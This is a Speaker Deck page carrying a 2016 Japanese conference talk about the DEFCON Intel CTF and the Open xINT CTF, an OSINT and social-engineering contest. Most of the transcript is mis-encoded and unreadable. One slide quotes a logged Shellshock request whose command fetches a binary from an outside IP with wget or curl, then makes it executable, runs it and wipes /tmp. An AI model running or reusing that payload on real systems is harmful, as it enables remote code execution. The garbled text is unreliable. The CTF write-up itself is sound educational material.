Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Intel CTF and Open xINT CTF 20161220
Search
Yuho Kameda
December 20, 2016
Technology
1
1.2k
Intel CTF and Open xINT CTF 20161220
OSINTのCTFに参加して開催した話で! 2016/12/20 #ssmjp
Yuho Kameda
December 20, 2016
Tweet
Share
More Decks by Yuho Kameda
See All by Yuho Kameda
How to use OWASP ZAP & Vulnerabilities Slikmap
ykame
0
8.9k
Enjoy Daily Life by handy tool
ykame
0
94
Find Trust-Information -Public- 20170630 #ssmjp
ykame
1
2.4k
Hey Siri! Hello Barbie! ssmjp
ykame
0
880
How to create the alert by script of ZAP
ykame
2
680
[bpstudy] OWASP ZAP Vulnerable Assesment.
ykame
2
1.3k
What is ZAP?
ykame
0
490
MINI Hardening #1.2 20分LT ZAPを使ったHardening対策術 2015/8/29
ykame
2
530
How to install VMwarePlayer and OWASP BWA
ykame
1
970
Other Decks in Technology
See All in Technology
権威ドキュメントで振り返る2024 #年忘れセキュリティ2024
hirotomotaguchi
2
760
LINEスキマニにおけるフロントエンド開発
lycorptech_jp
PRO
0
330
PHPerのための計算量入門/Complexity101 for PHPer
hanhan1978
5
210
祝!Iceberg祭開幕!re:Invent 2024データレイク関連アップデート10分総ざらい
kniino
3
310
サーバーなしでWordPress運用、できますよ。
sogaoh
PRO
0
110
【re:Invent 2024 アプデ】 Prompt Routing の紹介
champ
0
150
Google Cloud で始める Cloud Run 〜AWSとの比較と実例デモで解説〜
risatube
PRO
0
110
宇宙ベンチャーにおける最近の情シス取り組みについて
axelmizu
0
110
LINE Developersプロダクト(LIFF/LINE Login)におけるフロントエンド開発
lycorptech_jp
PRO
0
120
株式会社ログラス − エンジニア向け会社説明資料 / Loglass Comapany Deck for Engineer
loglass2019
3
32k
AI時代のデータセンターネットワーク
lycorptech_jp
PRO
1
290
サービスでLLMを採用したばっかりに振り回され続けたこの一年のあれやこれや
segavvy
2
490
Featured
See All Featured
A designer walks into a library…
pauljervisheath
204
24k
The Art of Programming - Codeland 2020
erikaheidi
53
13k
Code Review Best Practice
trishagee
65
17k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
2
170
Scaling GitHub
holman
458
140k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
Measuring & Analyzing Core Web Vitals
bluesmoon
4
170
The Language of Interfaces
destraynor
154
24k
Visualization
eitanlees
146
15k
Rails Girls Zürich Keynote
gr2m
94
13k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Transcript
OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz
ࣗݾհ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ༰
WebΞϓϦέʔγϣϯ੬ऑੑஅ ϓϥοτϑΥʔϜ੬ऑੑஅ SOC/CSIRTۀ ۓٸҊ݅ͳΜͰཁһ… ใऩू
ࠓ͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠
DEFCONͰIntel CTFʹ ࢀՃͨ͠
DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTFίϯςετ͕͋ΔϋοΧʔ ͷࡇయ
DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015͔Β࢝·ͬͨɺIntelligenceʹযΛͯͨ ڝٕ ୈ2ճ(2016)ͷςʔϚɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ
͍ͯ͘͠աఔͰ༷ʑͳΛճ͢Δ ༏উۚ$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ12ҐͰͨ͠
Intel CTFͷ݁Ռ
ͲΜͳ͕͋ͬͨͷʔʁ 1 The Vuln: What is the vulnerability that was
successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ͑ʮBashdoorʯ
ͦͷଞͷ <Level1> ϚϧΣΞͷ௨৴ઌʁ ߈ܸݩIPͷASN(Autonomous System Number)ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯʁ <Level2> ϚϧΣΞͷ໊લʁ ༻͕ແޮԽ͞Ε͍ͯΔ໊ؔʁ
Ϙοτͷ໊લʁ Bot Harder͕༻Δ͢ΔMaildropʁ
ଞʹ͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀిͯ͠ใࡡऔ͢Δڝٕ Black Badge͑Δۄίϯςετ blog.yka.me Ͱɺ2015ͷใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html
AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠
AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!
Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔͷCTFຊͰΓ͍ͨͰ͢Ͷʯ ʮձࣾؔͩͱ༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00
Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖ 8/12 Call For Xఏग़done
࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩
Open xINT CTFͱʁ http://xintctf.wpblog.jp/ ձͰͷؔऀͷฉ͖ࠐΈSNSͳͲͰඞཁͳใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱͷεύΠཆίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ)
߈ܸऀ(ϋοΧʔ) ৮ USB୳ࡧґཔ USBʹ᠘ΛࠐΜͰ৮ ಠࣗʹௐࠪ
7 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨεʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧϯτʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧϯτ ʁ
5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV TokyoͰ৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV TokyoͰʮϞϊʯΛͤ
͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰԠͷ͋ͬͨۙΛ୳͢
ৄ͘͠ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTFͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup
http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a
ࢀՃऀ : 93ਓ 1Ͱղ͚ͨਓ : 67ਓճ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4:
28ਓɺ5: 7ਓ
࠷ऴతͳ݁Ռʁ (700Ҏ্) [߹ܭ + εύΠಘ + ࠷ऴճ࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900
+ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ໊ͱҰக͠ͳ͍ํεύΠಘ͕0ͱͳΓ·͢ ಉͷ߹ɺ࠷ऴճ͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢